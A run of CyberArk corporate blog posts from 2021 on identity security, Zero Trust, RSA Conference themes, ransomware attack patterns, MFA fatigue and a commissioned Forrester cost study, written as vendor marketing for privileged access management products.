Developers are also a key target for advanced attackers. Gartner notes that “SolarWinds’ code was compromised in the development process, which has significant implications for the development community.”*

By compromising a privileged identity like a developer or pipeline orchestrator or infrastructure manager, attackers can dramatically scale their reach and impact — infecting customer-facing products and services and threatening the stability of the entire digital supply chain.

The urgency around protecting software development pipelines is coming from the highest levels of government. The White House issued a cybersecurity executive order this month, noting in a statement that “Too much of our software, including critical software, is shipped with significant vulnerabilities that our adversaries exploit. This is a long-standing, well-known problem, but for too long we have kicked the can down the road.”

Dig deeper: Explore use cases and best practices for securing privileged access in development environments, from validating the integrity of all code and builds to enforcing just-in-time access policies in these highly automated environments.

Q:  How will you increase protection of identities and privileged credentials?

A: We’ve adopted a Zero Trust approach to security, in which no actor can be trusted unless they’re continually verified. Zero Trust isn’t a specific technology but instead an approach that helps to ensure every user’s identity is verified, their devices are validated and their access is intelligently limited to just what they need —and taken away when it’s not needed.

Our strategy is to implement Identity Security controls that are foundational to this Zero Trust approach. These control center on defending against three of the most common attack chain phases and will be deployed in risk-prioritized phases to help:

  1. Block credential theft on the endpoint and prevent ransomware attacks
  2. Stop lateral and vertical movement
  3. Prevent privileged escalation and abuse

This approach aligns with best practices recommended by leading authorities such NIST, CISA, and NSA.

Dig deeper: Discover how the CyberArk Blueprint can provide your team with measurable risk-based advice to defend against identity-based attacks.

Q: How are other companies tackling identity-related challenges, and how do we benchmark our progress against industry peers?

A: A vast majority of recently surveyed security leaders see Zero Trust as key to mitigating risk: 88% say transitioning to a Zero Trust model is “important” or “very important.” To do this, Identity and Access Management (IAM) controls were cited as the No. 1 priority by 45% of respondents.

We’re following proven maturity frameworks from NIST and the Identity Defined Security Alliance to baseline, report on, and continuously measure the progression of our Identity Security posture. We’ve also tapped into guidance published by a group of Global 1000 CISOs on protecting identities and privileged access while transitioning to Zero Trust.

Dig deeper: Explore these five fundamental steps to help you establish parameters for your Identity Security program, define your risk tolerance and use meaningful metrics to report on outcomes. And see how the CyberArk Blueprint can provide your team with measurable risk-based advice to defend against identity-based attacks.

Q: How will Identity Security help advance our core digital transformation initiatives?

A: Implementing stronger security controls that minimize breach impact and protect what matters most is a core objective. Equally important is enhancing productivity, user experiences, and customer value. This is what will ultimately define our success as an organization. An identity-centric approach to security can help us achieve these objectives in unison.

Dig deeper: Aligning with business leadership requires an understanding of their own challenges and priorities, and the ability to think like a businessperson first (and a security person second). It’s important to demonstrate how Identity Security solutions can enable the digital business.

Q: What do you need from corporate leadership to make an Identity Security program successful?

A: By setting the right tone from the top, you can help ensure that we can successfully deploy a new set of Identity Security controls across the enterprise. Although security will drive the project, the affected systems are owned by the business. It will require cross-functional support. Some stakeholders will balk at the changes that must be made, such as giving up access rights or following new processes. Direction from leadership is crucial to moving ahead rapidly and maintaining momentum for sustained success.

Dig deeper: When making your business case for Identity Security, make sure you’re armed with data that demonstrates how the right approach can drive operational efficiencies and positive financial impact. And don’t go it alone: Enlist the support of others, such as risk management teams, to make cyber risk data “real” in the context of broader business goals. 

Attackers understand that all roads lead back to identity. Without adequate controls to protect identities throughout the cycle of accessing critical assets, organizations leave themselves exposed. Gaining executive-level support for an Identity Security program is the first step toward strengthening overall cyber resilience. Use this FAQ to make those critical conversations count.

*Gartner, “Top 10 Lessons Learned From the SolarWinds Attack,” 17 February 2021. Peter Firstbrook

]]>
RSA 2021: How CISOs Can Build Cyber Resilience for the Road Ahead https://www.cyberark.com/blog/rsa-2021-how-cisos-can-build-cyber-resilience-for-the-road-ahead/ Thu, 27 May 2021 13:51:08 +0000 https://www.cyberark.com/?p=118452 RSA Cyber Resilience Lessons

From captivating keynotes to impromptu coffee line chats to networking party hopping, there’s nothing like being together with thousands of industry peers for the RSA Conference. But while we missed the annual trek to San Francisco, this year’s all-virtual event held true to tradition, spotlighting the biggest trends shaping 2021, along with insights from some of the brightest minds in cybersecurity.

The 30th annual event’s theme of “Resilience” was woven across all 735 event talks, honoring three decades of industry accomplishments and celebrating the resilience CISOs, security leaders and their teams have demonstrated throughout this time of pandemic upheaval.

RSA 2021 Resilience

Source: RSA Conference

As CISOs and senior security leaders look ahead, this notion of resilience remains top-of-mind. They’re grappling with hard questions such as: “How must cybersecurity operations evolve to drive resilience in this new threat landscape?” “How can I keep cybersecurity at the forefront of business-level discussions, even after times of crisis have passed?” And, “How can cybersecurity become a transformation-enabler that’s directly linked to business success?”

As we reflect on the innovation, research, and education coming out of RSA 2021, seven key themes stood out to us. All will play a role in shaping the evolving — and expanding — role of the resilient CISO.

1. The Way We Work, Reimagined

The global pandemic has been the largest test yet for the future of distributed work. Remote workers have proven to be incredibly resilient as they continue to rise to the challenge of blending home and work lives. Now, as many regions of the world come out of lockdown, CISOs have a unique opportunity to provide strategic direction for sustained remote and hybrid work models — moving from legacy approaches and implementing new digital security strategies and user-friendly tools and policies that empower workers (wherever they may be).

2. Zero Trust is the Way… But One Size Does Not Fit All

There’s broad consensus around the value of Zero Trust. In fact, we lost count of how many times it came up during the conference. The complexity of today’s cybersecurity challenges demands a “trust nothing, verify everything” approach that repositions the security perimeter around individual identities.

But Zero Trust isn’t a one-size-fits-all kind of thing. The best way for CISOs to get started is to identify the organization’s greatest security risks — address them first, then extend controls to new areas over time. Equally important is mapping the change management journey and working with IT and end-users to understand and adopt this new mindset.

3. Think Like an Attacker to Minimize Attack Impact

Attackers are constantly innovating. We saw many examples of this throughout the conference — from SolarWinds CEO Sudhakar Ramakrishna’s presentation to our own CyberArk Labs teams’ demonstrations of Kubernetes cluster attacks, biohacks, and SSO compromise. By “assuming breach,” the question becomes, are you protected even if you’ve already been attacked? That’s where an attacker’s mindset can give CISOs the edge they need to stay one step ahead. By assuming that any identity in the network has already compromised, security teams can anticipate an attacker’s next move, minimize impact and stop threats before they reach valuable assets and cause harm.

4. Retrospectives Build Resilience

The SolarWinds digital supply chain attack prompted many CISOs to re-analyze current risk tolerance levels, cybersecurity and risk management efforts, areas of ongoing vulnerability, supply chain partner practices and more. It’s also the time, presenters urged, to update your incident response strategy, using frameworks like NIST as a guide. If your organization is attacked, use retrospectives to learn, further optimize your incident response strategy and build resilience. For example, “How were we compromised or breached?” becomes “How can we stop it next time?” (i.e., block lateral movement) — And “Why didn’t we realize this was happening?” becomes “How can we improve MITRE ATT&CK coverage?”

5. A Job Requirement: Fluency in the “Language of Business”

Recent headline-grabbing attacks have made cybersecurity a regular boardroom discussion and business imperative. It’s the CISO’s job to make sure it stays front and center, even when news cycles quiet down.

It’s critical to have the capability to quantify risk (and resulting mitigation actions) in terms of dollars and cents, demonstrate how the cybersecurity program will drive business — and directly link key initiatives to business objectives. Industry frameworks like Factor Analysis of Information Risk (FAIR) can help CISOs “demystify” cybersecurity and bridge communication gaps with Boards and executive management.

6. Communication Matters. A Lot.

But it doesn’t end with Board discussions. Today’s CISO must be able to effectively articulate cybersecurity’s value proposition to customers, partners and internal stakeholders too. With digital supply chain attacks under the microscope, the need to build trust through transparency has never been greater. This takes a special mix of both hard and soft communications skills — the power of empathetic communication cannot be overstated.

The good news is CISOs don’t have to shoulder the burden themselves. By actively collaborating with IT security teams, CISOs can strengthen their message to various audiences and break down siloes. And increasingly, organizations are bringing on Business Information Security Officers (BISOs) to help translate the security agenda and make sure security objectives are treated as business requirements.

7. The New Heroes of Digital Transformation

CISOs and security leaders must become strategic advisors from the onset of digital transformation initiatives. Doing so enables innovation to move faster with greater protections in place. For that to happen, however, they must proactively embrace an advisory position, giving guidance and strategy to key stakeholders from the start. To that end, CISOs should seek partners (both within the organization and through outside public and private partnerships) that will boost their advisory capacity, facilitate information sharing and accelerate the shift to the next stage of cyber resiliency.

One of our favorite moments from this year’s RSA Conference was the closing keynote, featuring special guest Steve Wozniak. In this time of turbulence, he encouraged CISOs and security leaders to focus on the bright side of resilience — one of innovation and reinvention. In this spirit, until we meet again in San Francisco in person, let’s learn, evolve and build resilience to, as the RSA team put it, “protect the people and organizations that rely on us as their advocates. We will do more than survive. We will thrive.”

]]>
Hack(er)-of-All-Trades: Q&A with CyberArk Technical Evangelist Andy Thompson https://www.cyberark.com/blog/hacker-of-all-trades-qa-with-cyberark-technical-evangelist-andy-thompson/ Tue, 25 May 2021 13:00:35 +0000 https://www.cyberark.com/?p=118296 Andy Thompson

We can’t help it. We hear the word “hacker” and our minds instantly go to shadowy figures in dark rooms frantically causing as much malicious digital mayhem as they can. It’s a misconception that bothers Andy Thompson on so many levels. It’s also one of the many reasons he’s a perfect fit as a CyberArk Technical Evangelist.

“Hacking is not a crime,” he says, “And that’s something that I really advocate for. Hacking is near and dear to my heart. I consider myself a hacker — somebody who uses a tool outside of its intended purpose to find a solution.”

This is the original root definition of the term after all — and part of Thompson’s new mission to bring that concept to the fore. Some of the earliest known uses of “hack” have no negative connotations — in fact, the word was used in tech circles synonymously with “to work on.” It was the word used by tinkerers and the technologically curious, people who loved to take things apart to see how they tick … and engineer them to tick better.

“Yeah, that was me,” says Thompson. “I built my own machine at 12. I was definitely the person who would dissect any sort of piece of electronic that I could get my hands on.”

A self-described “jack-of-all-trades,” the Dallas-born Thompson came to CyberArk after a long and eclectic tech career. He gained not only valuable experience but also the realization that what he really enjoyed was talking about cybersecurity at a high level — coaxing people to understand, well, how it all ticks.

Thompson joined the CyberArk Customer Success Team in 2016. His skills and unique experience helped him lead a specialized group that he describes as a “SWAT team made up of CyberArk Solutions Engineering and Customer Success members.” Now a Technical Evangelist for CyberArk Labs, his journey here hasn’t been a straight line, but it’s made him right at home as an advocate for pure hacking culture and an identity-centric approach to cybersecurity.

We recently met up with Andy — virtually — to hear about his new role and how he got there. The following are excerpts from our conversation, which have been ever-so-slightly edited and condensed for clarity:

Your path to CyberArk took you through a lot of industries and organizations. What made you decide that this was going to be your calling?

Technology was just something that I’ve done ever since I was a child. I remember dialing in at midnight on my 286 to get into bulletin board systems.

I graduated with a bachelor’s in information systems from the University of Texas at Arlington. I was going to go to law school — in fact, I prepped taking the LSAT — but then I just had a moral problem with being a criminal defender, which was my original plan. I decided to go back to what I knew: information systems. CyberArk was my first foray into sales, honestly. I was a systems administrator and a website developer. I’ve worked technology in industries from healthcare to movie theaters, bars, restaurants, global retail and IT, doing everything from Windows systems administration to managing Linux/Unix Systems.

Is it true that your own experience getting hacked opened the door to your joining CyberArk?

One of my former employers was targeted in an attack, which I took as a personal affront.

We ended up tracking down the perpetrator, using what I call open source intelligence gathering, and sending law enforcement to his door. One of the agents working the case said to me, “Hey, you got a knack for security. Have you ever thought about doing InfoSec?”  The rest, as they say, is history.

Another thing I experienced while working in-house was the frustration of deploying and using a Privileged Access Management platform that just wasn’t very good. I thought, “I got to go find something that works better than this.” Coincidently, it was my best friend since we were 11 years old, Allan Cox, a Principal Solutions Engineer at CyberArk, who encouraged me to come work here. And I’m glad he did, as I truly believe that what we’re doing at CyberArk is a calling. We’re protecting people and data, and at the end of the day, I can go to bed knowing that we’re making the world a little bit better. I know that sounds corny, but it’s true.

What is your day-to-day like now?

My primary role is championing the amazing tools and research coming from CyberArk Labs. Our Labs team — now these are the real hackers. These are the ones who are finding new vulnerabilities and exploits, demonstrating offensive tactics, and helping organizations adopt an attacker’s mindset.

Our Attack & Defend Virtual War Room Experience is a great example of how we’re getting the team’s cutting-edge research out to the masses. One of our latest events featured a live simulation with Len Noe demonstrating five of the most notorious breaches in recent history, all based on CyberArk Labs’ attack deconstructions and threat research. I’m loving it.

With all of the industries and organizations you’ve worked for, have there been any consistencies that you can still draw on in your current role?

One thing I see across the board is the human element of risk. Sure, there are vulnerabilities from time to time, but nine times out of 10, you’re going to see attackers take advantage of software or systems that have been unintentionally misconfigured. In fact, the new Verizon DBIR 2021 identified misconfigurations as the most common form of error-driven breach by far.

To give an example, there was a major attack reported a few years back on a large enterprise that all started with a misconfigured firewall. The attacker used it to enter the company’s cloud provider network and gain privileged access to a virtual machine (VM). Then, by compromising access keys and assuming an over-permissioned role, the attacker obtained temporary privileged credentials to the company’s cloud database, which contained troves of sensitive customer data. As a result of the breach, the organization was forced to pay millions of dollars in regulatory fines.

Misconfigurations are rampant and only getting worse — especially in cloud environments. And it sometimes feels like you’re yelling into the abyss because you’re telling people to do something and they’re not listening because maybe it’s more operationally efficient to cut a couple corners here or there — it’s frustrating for sure. But I also get it: I made plenty of snafus in my old sysadmin days and know how easy it is for misconfigurations to happen — and add up fast. It’s my hope that I can help today’s sysadmins and cloud architects steer clear of similar mistakes and find ways to tackle these challenges in simpler, more automated ways.

]]>
Breaking Down the Business Benefits and Cost Savings of CyberArk Privileged Access Management as a Service https://www.cyberark.com/blog/breaking-down-the-business-benefits-and-cost-savings-of-cyberark-privileged-access-management-as-a-service/ Tue, 18 May 2021 13:00:48 +0000 https://www.cyberark.com/?p=118101 Forrester TEI Report PAM SaaS

By now, most organizations understand the importance of Privileged Access Management (PAM) in reducing risk and protecting critical assets from inevitable cyber attacks. But what may be less obvious are the operational efficiencies and positive financial impact the right solution can have on your business.

CyberArk recently commissioned Forrester Consulting to conduct a Total Economic Impact™ (TEI) study to examine the business benefits and cost savings enabled by two of our Privileged Access SaaS solutionsCyberArk Privilege Cloud and CyberArk Endpoint Privilege Manager — which are often used together to secure privileged access from the endpoint to hybrid workloads.

The Total Economic Impact™ Of CyberArk Privileged Access Management As A Service” quantifies benefits realized by a composite organization (which we’ll refer to here as the “Organization”), based on data aggregation and in-depth interviews with five CyberArk enterprise customers in the financial, insurance, healthcare and legal sectors. Our hope is that security leaders can tap into these peer insights to help make informed Privileged Access Management prioritization and investment decisions.

Below, we break down four of the study’s top findings and explain why they matter:

1. Fill Cybersecurity Skills Gaps and Simplify Operations

According to a 2021 PwC report, more than half (51%) of organizations are planning to add full-time cybersecurity personnel over the next year, with cloud solutions topping the list of roles they want to fill at 43%. Yet finding the right people is no small task: the global number of unfilled cybersecurity jobs is expected to reach 3.5 million this year. Simply put, most organizations don’t have a surplus of trained security professionals on staff to deal with infrastructure headaches and time-consuming administrative processes, such as discovering and onboarding privileged accounts and manually changing credentials and secrets.

Forrester found that by using CyberArk PAM as a service, the Organization realized an estimated time savings of 780 hours annually, which translates to operational efficiency savings worth $104,914 over three years. With this new-found bandwidth, internal IT staff can focus valuable time and efforts on strategic tasks that support core business activities. And, with hundreds of out-of-the-box integrations available from the CyberArk Marketplace, CyberArk integrates seamlessly into existing IT security stacks and provides immediate time to value.

“CyberArk Privilege Cloud allows our organization to secure our infrastructure and applications and to run our privileged access management activities much more efficiently while maintaining the confidentiality of sensitive data,” said a director of information security at a large insurance organization.

2. Improve Regulatory Compliance and Ease Audits

Organizations are contending with an alphabet soup of industry regulations and security frameworks like SOX, HIPAA, PCI-DSS, MAS TRM, NERC CIP, SOC 2 Type 2 and CMMC, among many others. With so many different users, disparate IT systems and hybrid and multi-cloud environments, many organizations struggle to meet requirements and prove to auditors that privileged access and least privilege enforcement are under control.

By centralizing and automating the enforcement of privileged access policies with CyberArk, the Organization realized $152,435 on compliance, regulatory and audit labor savings over three years.

Interviewees also indicated that simplified audit reporting has helped improve their relationships with auditors and regulators. A president of global identity access management at a financial services firm explained why this is critical: “There’s nothing that annoys a regulator more than coming in and finding deficiencies that you as an organization didn’t already identify. Because, to them, their perception is that they found something that you didn’t know you had. So, CyberArk really does give you more credibility with the outside auditors and regulators by its ability to prove full compliance of regulations.”

3. Protect Endpoints Anywhere and Block Ransomware Attacks

Endpoint attacks such as spear-phishing and ransomware can disrupt business, damage organizational reputation and result in crippling lawsuits and fines. Ninety-seven percent of senior security executives say attackers are increasingly trying to steal one or more types of credentials in such attacks on PCs, Macs, servers and remote devices. And they’re zeroing in on business users with access to sensitive data who may not be adequately protected or trained to spot a spoof. It only takes one unsuspecting user to click on a malicious link, open the door for an attacker and set off an attack chain leading to stolen data or encrypted information held for ransom.

Local administrator rights are often left on endpoints, making them attractive targets for attackers who can use these credentials to elevate privileges and launch into other parts of the network. Removing local admin rights from workstations significantly reduces risk but can inhibit productivity while workers wait for necessary access to systems and software, and overburden IT help desk teams with install requests and configuration changes. There’s a need for more flexibility and automation when it comes to both requesting and provisioning privileged access to company resources. And as ransomware attacks surge — and 59% of security decision makers view ransomware as a top security risk — organizations are looking for a way to shore up vulnerabilities, improve security posture and mitigate risk.

The Organization found a balanced approach to securing endpoints and maintaining productivity with CyberArk Endpoint Privilege Manager. Forrester calculated resulting service desk benefits worth $70,502 over three years. Each year, the Organization was able to save 780 IT help desk service requests at a cost of $40 per ticket, helping end users and IT teams boost productivity.

CyberArk Endpoint Privilege Manager has been tested on more than three million ransomware samples to date, and its unique approach to local administrator rights removal and application control has been proven 100% effective in preventing this ransomware from encrypting files.

4. Reduce Risk of Serious Security Breach

Today, the leading cause of breach is identity compromise and the subsequent abuse of privileged credentials. Every corporate identity — whether human or machine — can have privileged access under certain conditions, creating an attack path to an organization’s most valuable assets.

CyberArk Privileged Access solutions secure privileged access wherever it exists. Our privileged access-led approach to Identity Security is designed to help enterprises adapt and embrace a risk-based strategy for defending against advanced attacks. By focusing on identifying and isolating threats that have made their way through the dissolving security perimeter, organizations can defend the heart of the enterprise, protecting what matters most.

This approach enabled the Organization to reduce risk of a serious security breach — a cost avoidance savings valued by Forrester at $586,711 over three years. When making this calculation, Forrester took two major categories into account: the cost avoidance savings of a breach (fines, lawsuits, reputational damage, etc.) and the cost avoidance savings of internal productivity loss associated with a breach.

The Bottom Line

According to Forrester, by using both CyberArk SaaS solutions, the Organization achieved a total three-year, risk-adjusted benefit of $914,562, and realized full ROI in less than nine months.

Of course, there are some business benefits that just can’t be quantified, like the peace of mind that comes with knowing your most critical assets are secure — and having the confidence to accelerate business agility, knowing you’re fully covered today and in the future.

A financial services vice president of global identity access management summed those intangibles up in the study: “At our company, CyberArk’s solutions provide an additional level of value through risk reduction that’s afforded to our shareholders and our customers by virtue of the security that we’re implementing and the protection that they’ve come to expect.”

But there’s more to the story. Check out the infographic or download the study for a full analysis, as well as customer testimonials, deployment considerations, integration insights and other key findings.

This blog post highlights key findings of a case study commissioned by CyberArk titled: The Total Economic Impact™ Of CyberArk Privileged Access Management As A Service, March 2021.

© 2021 Forrester Research, Inc. All rights reserved. Forrester is a registered trademark of Forrester Research, Inc.

 

]]>
Opportunistic vs. Targeted Ransomware Attacks https://www.cyberark.com/blog/opportunistic-vs-targeted-ransomware-attacks/ Wed, 12 May 2021 13:00:12 +0000 https://www.cyberark.com/?p=117734 Targeted Opportunistic Ransomware Attacks

The critical infrastructure systems we rely on to deliver water, electricity, fuel and other essential services are under siege. Increasingly, ransomware is becoming cyber criminals’ attack method of choice, for they understand that even short periods of downtime can cause far-reaching disruption and damage. This puts extreme pressure on victim organizations to pay up in order to decrypt data and restore operations quickly.

While industrial systems may be top-of-mind today, the threat of ransomware knows no boundaries, and no individual or industry is safe from its reach — especially in the age of cloud, mobile and highly distributed workforces.

U.S. Acting Deputy Attorney General John Carlin recently told the Wall Street Journal, “By any measure, 2020 was the worst year ever when it comes to ransomware and related extortion events.” During the height of the COVID-19 pandemic, for example, ransomware operators targeted hospitals and healthcare organizations with unrelenting attacks. Ransomware accounted for 54.95% of healthcare data breaches and cost the industry $20.8 billion in downtime last year alone.

But why is ransomware so pervasive, and how do these attacks continue to be so successful? To answer these questions, it’s important to understand how opportunistic and targeted ransomware attacks work.

What is an Opportunistic Ransomware Attack?

A whopping 86% of breaches are financially motivated, according to the 2020 Verizon Data Breach Investigations Report. Attackers know that ransomware is one of the quickest and easiest ways to turn a profit. And since do-it-yourself ransomware kits are plentiful on the dark web, the barrier to entry is low.

By distributing ransomware in bulk using common “spray and pray” tactics — such as phishing, social engineering and exploit kits — attackers can target many organizations and infect numerous desktops, laptops and servers in one fell swoop. Once deployed, the ransomware prevents users from interacting with their files, applications or systems until a ransom is paid, usually in the form of an untraceable currency like Bitcoin.

The 2017 WannaCry outbreak is perhaps the best example of an opportunistic ransomware attack. With the ability to self-replicate, this ransomware strain went viral, infecting more than 200,000 systems across 150 countries. The attack impacted organizations across many sectors, bringing business operations to a grinding halt. Britain’s National Health Service (NHS) was forced to close critical healthcare facilities, cancel surgeries and turn away patients for several days. Many organizations faced similar challenges.

Ransomware has become a preferred means of extortion by opportunistic attackers for two key reasons. First, many organizations fail to practice proper security hygiene when it comes to backup and recovery. Backups may be few and far between, meaning that once data on endpoints and servers is encrypted and held for ransom, organizations are forced to choose between losing important data forever or forking over Bitcoin to (hopefully) get their data back. Second, many organizations rely too heavily on traditional anti-virus solutions, which are often not effective in blocking ransomware. These solutions work by maintaining an inventory of known malware and blocking future executions of that malware. Because ransomware files slightly morph with each new version — and new versions are created by the minute — these solutions have little chance of preventing an infection.

What is a Targeted Ransomware Attack?

In recent years, more sophisticated attackers have shifted to targeted ransomware approaches in search of bigger payouts. In what is sometimes referred to as “big game hunting,” these attackers target very specific organizations based on their ability (or need) to pay large ransoms, using customized tactics, techniques and procedures (TTPs).

These attackers are very creative, often going to great lengths to understand a victim’s technology stack so they can identify and exploit vulnerabilities, while pinpointing the most valuable data to encrypt and hold for ransom. They’re also extremely patient, escalating privileges to circumvent security systems and evading detection for months — or longer — before deploying the ransomware payload. During this time, attackers often target data backups (if they exist) so the organization cannot restore files after they’ve been encrypted. And these attackers expect to be compensated for putting in the extra work. According to the 2021 Unit 42 Ransomware Threat Report, the highest ransomware demand from 2015 to 2019 was $15 million. In 2020, the highest demand doubled to $30 million.

A recent example of this long-tail, targeted approach is the Hades ransomware attacks. ZDNet reports that ransomware operators are targeting large multi-national organizations with annual revenues of over $1 billion and have successfully attacked at least three companies in the transportation, retail and manufacturing industries.

Based on Accenture researchers’ analysis of these Hades ransomware attacks, the threat actors followed a familiar attack path: steal valid credentials from a corporate identity and use these credentials to infiltrate the company via Remote Desktop Protocol (RDP) or Virtual Private Network (VPN). Once inside, the attackers escalated privileges and moved laterally to establish persistence on the network. From there, they exfiltrated data and then deployed the Hades ransomware to encrypt files and demand hefty ransoms in a one-two, double extortion punch.

The researchers noted, “We observed significant effort by the threat group to disable or bypass endpoint defenses, including Endpoint Detection and Response (EDR) tooling, using both custom tooling and hands on keys approaches.”

Perhaps the most troubling thing about targeted ransomware attacks is that just because an organization has been targeted once, it doesn’t mean it won’t happen again. To maintain persistence on target networks, attackers often construct backdoors that allow them to reenter at will. Most companies cannot withstand the business impact of one ransomware attack, let alone two.

Opportunistic or Targeted, the Initial Attack Vector Remains the Same

Whether opportunistic or targeted, ransomware attacks start on the endpoint. Inadequately protected desktops, laptops and servers are pervasive — and each one provides a potential entry point for attackers to steal and encrypt data.

By examining numerous ransomware attacks, one thing is abundantly clear: relying on a single endpoint security solution — endpoint detection and response, anti-virus or otherwise — is not enough to stop every threat. In fact, organizations are wise to adopt an assume-breach mindset to reduce the chances of ransomware encrypting files, even if it does enter their environments. And ultimately, a defense-in-depth approach is necessary, layering a variety of security controls to eliminate gaps, reduce exposure and strengthen overall security posture. When it comes to endpoint security, one plus one really does equal three.

Privileged Access Management is a critical, yet often overlooked, component of an effective endpoint security strategy. If a malicious attacker or insider gains access to a privileged credential, he or she will appear to be a trusted user. This makes it very difficult to detect risky activity.

In combination with endpoint detection and response, anti-virus/NGAV, application patching and OS patching, organizations can significantly reduce risk by managing and securing privileges on endpoint devices. And by implementing restriction models that only trust specified applications run by specific accounts under specific circumstances, organizations can detect ransomware quickly and with certainty. By taking this comprehensive approach to endpoint security, organizations can defend from every angle and block attacks before they cause harm — whether they’re “sprayed” in their general direction or headed straight toward them.

To dive deeper into ransomware attack trends and mitigation strategies, register for our June 1 webinar, “Ransomware Exposed: Key Learnings from Examining 3 Million Samples.”

 

 

]]>
Video: What Nightclub Security Reveals About Privileged Access Management https://www.cyberark.com/blog/video-what-nightclub-security-reveals-about-privileged-access-management/ Thu, 06 May 2021 11:00:33 +0000 https://www.cyberark.com/?p=117527 PAM Lessons from Nightclub Security

Let’s face it – we’re collectively ready for a night on the town. And while nightclubs may not be everyone’s bag, we predict they’re going to be bustling soon, with both regulars eager to again rejoice with a festive crowd and newcomers keen to never let another fun opportunity pass them by. Because, yes, as of this moment there’s seemingly light at the end of the pandemic tunnel, and thumping bass will beckon us to celebrate – and maybe even dance without a care for social distancing. Maybe? And when nightclubs are back in full force it’ll be a pretty strong sign that normalcy again reigns.

Those of us working in IT and security, who’ve been making remote work possible – and safe – will no doubt be among the first to get in line behind the velvet rope. And because of what we do, we couldn’t help but think about how getting into a club, and nightclub security in general, have many parallels with Identity Security – a discipline that’s become ever more important during the last year’s accelerated shift to digital. Centered on privileged access management (PAM), Identity Security has been integral to handling the exponential growth in identities and credentials with elevated access, all of which need to be managed, monitored, and controlled to remain safe.

Yes, we geek out on this stuff – always.

Check out our short video to see how nightclub security is just like protecting privileged access across your organization. Because privilege can be found everywhere – across all identities, devices, and apps from the endpoint to the cloud. And then, get ready to get your boom boom boom on. Safely, of course. We’ll maybe even give you permission to enter the VIP lounge.

]]>
Put Your Best Foot Forward: Secure MFA Starts with the First Step https://www.cyberark.com/blog/put-your-best-foot-forward-secure-mfa-starts-with-the-first-step/ Tue, 04 May 2021 12:00:09 +0000 https://www.cyberark.com/?p=117537 MFA Foundational to Zero Trust

When attempting to implement a Zero Trust security model, that first step is the most important… but maybe not for the reasons you think. We don’t mean this in a symbolic sense – it’s not the “first step” toward a grand vision or mission statement about an organization’s commitment to robust security. No, we mean it in a very real, practical sense. That first step is important because it’s there when the most potentially damaging mistakes are often made.

Multi-Factor Authentication (MFA) is one of those Zero Trust building blocks that’s susceptible to weak points — some due to deployment missteps, but most because it’s incredibly difficult to balance stringent security with practical usability. Unfortunately, it’s often unclear until after a system is in place if you’ve veered too much toward one or the other.

Since combined MFA and Single Sign-On (SSO) systems are often an organization’s gateway to Zero Trust, it’s important not to stumble on your way through it. This requires an understanding of the challenges inherent in MFA implementation — many of which aren’t always immediately apparent — and a clear sense of the long-term strategy for effectively anticipating and thwarting attacks.

If “the journey of a thousand miles starts with a single step,” it’s important that first one lands on solid ground. Here’s how you can help ensure it does.

Your Organization is Only Human

There are two truths when it comes to cybersecurity. One, attackers are constantly inventing new ways to circumvent blockades. And two – simple human error is one of the quickest and easiest ways to get inside a network, regardless of existing technological roadblocks.

“MFA fatigue” is real, and it can undermine security efforts in potentially damaging ways. There are a number of ways in which a Zero Trust implementation can reveal resulting vulnerabilities. The most notable is that most users, when faced with repeated authentication messages and touchpoints, can become lazy or careless and unwittingly create openings for attackers.

For example, when faced with repeated prompts for re-authentication, most users will simply click “yes” to rid themselves of the pop-up, without reading the request or taking the time to consider its legitimacy. It’s simple human nature — if your phone is “dinging” repeatedly, you’ll do whatever you can to make it stop. That could mean clicking on a malicious prompt or even logging in to a screen designed to look like one of your usual systems. Either way, the attacker is banking on MFA fatigue to make the user careless.

Other avenues for attack include hijacking an SSO session by compromising the very machine the user is employing through malware or other such means. Secondary channels are also often left unprotected, such as in cases that enable Active Directory environments by default. For example, with Server Message Block (SMB) and Remote Procedure Call (RPC) an attacker would only need a username and password and no secondary verification.

These are classic privileged access challenges — and why security teams should “own” UX. This can help ensure MFA and SSO system security is bolstered with Privileged Access Management (PAM) controls that add variant layers of security to all available access points. Recent attacks have shown that if your authentication systems are protected by passwords and nothing else, it’s no longer a question of if you will be compromised but when.

Striking the Right Balance

The CISO View 2021 Survey: Zero Trust and Privileged Access found that a majority of the respondents, an overwhelming 86%, agreed that optimizing the user experience was “very important” or “important” when implementing Zero Trust. The willingness is there; however, putting it into practice reveals just how tricky that balance between usability and security can be.

The CISO View survey pointed toward two keys to minimize friction (and thereby improve UX) — utilizing passwordless authentication and artificial intelligence (AI). The first speaks to having multiple layers of authentication — usually a mix of some kind of physical device such as a USB key or QR code — that are naturally stronger lines of defense and biometrics (such as facial recognition, fingerprint scanning).

But it’s the second — AI — that offers the critical context and insights needed to effectively balance user experience with security. When it comes to MFA, it’s not just about the number of different data signals an AI system can ingest, but also the ways it can interact with that data to help organizations automatically learn the “normal” behavior of each individual identity. And when they detect a deviation from that baseline, or any other risky event, organizations can easily block an employee’s access until they go through a stronger round of authentication.

To put it another way, the push for AI and machine learning isn’t a race to create the smartest algorithm — it’s the race to create the most informed.

AI can and will also play an important role in automating the evaluation of risk. Re-authentication requests would, therefore, be required only for risky access requests based on context and behavior — those that deal with highly sensitive data. This would cut down on the dull repetition of re-authentication requests for “everyday” interactions, which will reduce fatigue and improve UX.

Practical Advice

Zero Trust is a big idea. It encompasses big-picture thinking while depending mightily on the small details, right toolset and human elements that keep it working. When an organization is looking to move toward a Zero Trust model, that first step can seem elusive and fraught with peril.

But as we’ve seen, strong Identity Security offers a solid, practical way to achieve Zero Trust. It delivers the right mix of solutions to secure individual identities throughout the cycle of accessing critical assets — starting with adaptive authentication mechanisms protected in an almost symbiotic way with strong privileged access controls. This helps ensure the user experience is designed not only for optimal security but also for smooth, easy, and efficient UX that won’t lull users into making critical mistakes.

Even as security measures become more advanced, attackers know that human error is a reliable weakness to exploit. Don’t wait until you’ve been breached to fix those holes, take the steps to build a solid MFA foundation that’s dependable and practical — from the very beginning.

]]>
Can You Stop a Cyborg Attack? Get Inside a Biohacker’s Mind at RSA 2021 https://www.cyberark.com/blog/can-you-stop-a-cyberborg-attack-get-inside-a-biohackers-mind-at-rsa-2021/ Fri, 30 Apr 2021 12:00:38 +0000 https://www.cyberark.com/?p=117422 Len Noe Biohacking RSA

With a consuming curiosity, obsession with lock picking – both physical and abstract – and sharp technical mind, Len Noe has been breaking and building things nearly all of his life. Hacking, as he discovered at a young age, was not only a form of self-expression and creativity but also a powerful tool that could be used in many different ways – even to extend one’s own physical capabilities and cognitive capacity.

Today, as a white hat hacker and global sales engineer at CyberArk, Noe uses his unique skills to help organizations get inside the minds of attackers, so they can protect themselves and strengthen their cyber resilience.

